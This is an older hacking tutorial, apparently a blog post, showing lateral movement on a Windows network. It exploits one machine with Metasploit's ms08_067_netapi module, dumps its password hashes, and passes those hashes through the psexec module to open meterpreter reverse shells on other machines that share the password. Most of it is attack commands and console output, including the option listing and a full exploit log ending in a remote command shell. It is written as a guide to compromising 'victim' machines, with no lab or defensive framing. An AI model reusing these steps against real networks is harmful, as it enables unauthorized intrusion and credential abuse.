Type: Tutorial
Level: Medium, Advanced
The main problem of people nowadays with password it's hard to remember, that's why they usually put the same password for every account and even for every device they have. For example if you're in school, university, or office when they have a lot of computer, it's impossible to give different password to every computer especially when the person who use the computer are not familiar with computer, that's why usually they use same password for all of the computer, because when there's some problem happen, the IT person will try to maintain it or remote it using template password they already provided.
In this tutorial, we will compromise one victim computer and then get their password hash, after that we log in into another computer(with the same password) by using password hash, no need to cracking the password first to plain text 🙂
2. Linux Operating System or Backtrack 5(Metasploit framework already included inside this distro)
1. First of all you should have vulnerable target, and then set your payload to run meterpreter when the exploit successfully launched. You can view my previous post about meterpreter search(see on step 1). In this example I use exploit/windows/smb/ms08_067_netapi exploit.
2. After successfully inside victim computer, we will get the password hash.
FYI : in this case I will use the username : victim and assume that all username in that place is also victim(but it's usually using username : Administrator)
3. Okay, after we get the victim password hashes, we will try to connect to another victim that "maybe" use the same password(or maybe they are in the same network :-p ). I will use psexec here and set the payload to use meterpreter reverse_tcp.
4. You can take a look what options does this exploit and payload has by running show options.
msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic
Information :
RHOST = remote host or target ip address
SMBPass = password hash
SMBUser = username
LHOST = our local computer use to attack
5. That's the options we need to set up and below is my configuration on my backtrack 5 box.
6. After everything is set up correctly, then launch the exploit command.
msf exploit(psexec) > exploit [*] Started reverse handler on 192.168.8.90:4444 [*] Connecting to the server... [*] Authenticating to 192.168.8.95:445|WORKGROUP as user 'victim'... [*] Uploading payload... [*] Created \hMnZxVRG.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.8.92[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.8.92[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (nRxylOJY - "MIkxdjvELJLYUpzSEqmpscBGIwls")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \hMnZxVRG.exe... [*] Sending stage (752128 bytes) to 192.168.8.95 [*] Meterpreter session 2 opened (192.168.8.90:4444 -> 192.168.8.95:1068) at 2011-07-16 01:26:24 +0800 meterpreter > shell Process 1876 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
Below is my screenshot :
Thats it! We're already on another computer. We successfully connect to a seperate computer with the same credentials without having to worry about cracking the password.
hope it's useful.